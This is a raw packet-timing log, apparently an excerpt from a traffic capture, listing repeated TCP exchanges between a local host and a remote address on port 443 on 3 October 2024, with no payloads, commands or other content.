                                                                                                                                                                  Oct 3, 2024 03:36:03.531848907 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.531867981 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.554790974 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.554852009 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.554930925 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.554938078 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.554980040 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.563936949 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.564002037 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.564035892 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.564042091 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.564052105 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.564078093 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.587356091 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.587438107 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.587445974 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.587477922 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.587507963 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.587522984 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.608119011 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.608148098 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.608189106 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.608205080 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.608220100 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.608253956 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.619687080 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.619718075 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.619790077 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.619811058 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.619824886 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.619853020 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.620807886 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.620825052 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.620874882 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.620881081 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.620904922 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.620923042 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.622132063 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.622149944 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.622201920 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.622212887 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.622256041 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.622329950 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.623075008 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.623090029 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.623141050 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.623148918 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.623183012 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.646130085 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.646157026 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.646229029 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.646250963 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.646296024 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.656693935 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.656716108 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.656794071 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.656810045 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.656851053 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.677862883 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.677891970 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.678108931 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.678133011 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.678181887 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.699589968 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.699625015 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.699784994 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.699809074 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.699851036 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.710635900 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.710671902 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.710724115 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.710742950 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.710760117 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.710779905 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.712059021 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.712078094 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.712119102 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.712129116 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.712157011 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.712166071 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.713799000 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.713819027 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.713876009 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.713885069 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.713922977 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.714709044 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.714728117 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.714780092 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.714788914 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.714823008 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.739821911 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.739847898 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.739932060 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.739949942 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.739990950 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.749392986 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.749413967 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.749499083 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.749511003 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.749541044 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.768416882 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.768440008 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.768587112 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.768599987 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.768647909 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.790364027 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.790396929 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.790522099 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.790535927 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.790575981 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.803103924 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.803124905 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.803199053 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.803209066 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.803251028 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.804300070 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.804317951 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.804368973 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.804373980 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.804413080 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.805948973 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.805972099 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.806008101 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.806013107 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.806041002 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.806051970 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.806910038 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.806926012 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.806976080 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.806981087 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.807015896 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.849628925 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.849651098 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.849796057 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.849812031 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.849855900 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.858381033 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.858406067 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.858481884 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.858491898 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.858536959 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.864286900 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.864320993 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.864419937 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.864425898 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.864466906 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.882205963 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.882227898 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.882328033 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.882337093 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.882389069 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.893665075 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.893683910 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.893749952 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.893760920 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.893800974 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.894714117 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.894745111 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.894785881 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.894794941 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.894817114 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.894834995 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.896780014 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.896796942 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.896853924 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.896862030 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.896898985 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.897850990 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.897866964 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.897923946 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.897931099 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.897967100 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.939866066 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.939925909 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.940100908 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.940114021 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.940161943 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.949354887 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.949398994 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.949453115 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.949464083 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.949484110 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.949501991 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.953707933 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.953762054 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.953809977 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.953824043 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.953841925 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.953860998 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.972465038 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.972526073 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.972583055 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.972594023 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.972630024 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.972647905 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.984390020 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.984437943 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.984493017 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.984500885 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.984529018 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.984544039 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.985531092 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.985572100 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.985601902 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.985609055 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.985635996 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.985652924 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.986679077 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.986718893 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.986753941 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.986759901 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.986769915 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.986790895 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.987818003 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.987863064 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.987886906 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.987893105 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.987924099 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.987930059 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.029926062 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.029969931 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.030014992 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.030028105 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.030073881 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.041222095 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.041274071 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.041330099 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.041347027 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.041358948 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.041379929 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.045773029 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.045819044 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.045861006 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.045876026 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.045893908 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.045907974 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.093883038 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.093904972 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.094031096 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.094044924 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.094084024 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.095135927 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.095150948 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.095206976 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.095212936 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.095257044 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.096257925 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.096271992 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.096323013 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.096328974 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.096360922 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.097841978 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.097856045 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.097907066 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.097915888 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.097951889 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.126739025 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.126754999 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.126873016 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.126880884 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.126924038 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.129915953 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.129929066 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.129981041 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.129987001 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.130038977 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.138133049 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.138154030 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.138202906 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.138209105 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.138242960 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.140506983 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.140532017 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.140569925 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.140578032 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.140599966 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.140618086 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.184739113 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.184756994 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.184811115 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.184824944 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.184854031 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.184870958 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.186475039 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.186491966 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.186532974 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.186537981 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.186573029 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.187658072 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.187674999 CEST4434972849.12.197.9192.168.2.6
